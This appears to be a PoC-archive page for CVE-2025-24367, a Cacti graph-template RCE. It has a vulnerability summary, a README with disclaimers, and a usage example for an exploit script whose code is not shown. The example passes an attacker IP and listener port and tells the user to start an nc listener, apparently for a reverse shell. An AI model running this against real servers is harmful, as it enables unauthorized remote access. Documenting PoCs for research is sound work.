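Related vulnerability
Title: Cacti security vulnerability (CVE-2025-24367)
Description: Cacti is an open-source network traffic monitoring and analysis tool from the Cacti team. It uses snmpget to collect data, uses RRDtool to draw graphs for analysis, and provides data and user management features. Cacti contains a security vulnerability that stems from authenticated users abusing the graph creation and graph template functionality to create arbitrary PHP scripts in the application's web root, leading to remote code execution.
Description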
Proof of Concept for CVE-2025-24367
Introduction
# CVE-2025-24367 - Cacti Authenticated Graph Template RCE
# Usage & Safety
> **Important — Read this first:**
> This repository and `exploit.py` are provided **for educational and research purposes only**. Do **not** use this code against systems, networks, or services for which you do not have **explicit, written authorization**. Unauthorized access to computer systems is illegal and unethical. By using this code you agree to follow applicable laws and institutional policies.
---
## Requirements
- Python 3.8+
```bash
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
```
---
## Usage
```text
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
```
### Example
Before running the script, make sure you have an nc listener running. Run the script without the proxy unless you are debugging:
```bash
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
```
---
## VERY IMPORTANT WARNINGS
- **Do not run this against production systems or any system you do not own or have explicit permission to test.**
- Always obtain **written authorization** before performing security testing.
- Use isolated lab environments (e.g., VMs, containers, or purpose-built test networks) for experimentation.
- Your organization may have reporting and disclosure policies — follow them.
- The authors accept no responsibility for misuse of this code.
**Final reminder:** This script and README are for **educational use only**. Never use these tools to access systems unlawfully.
File snapshot
[4.0K] /data/pocs/92cbbde36402f290f268b52109a526ab51b5a843
├── [8.3K] exploit.py
└── [1.6K] README.md
1 directory, 2 files
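Notes
1. Accessing the PoC through its original source is recommended first.
2. If the source is no longer valid or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you. To support long-term maintenance, please consider paying for the local PoC. Thank you for your support.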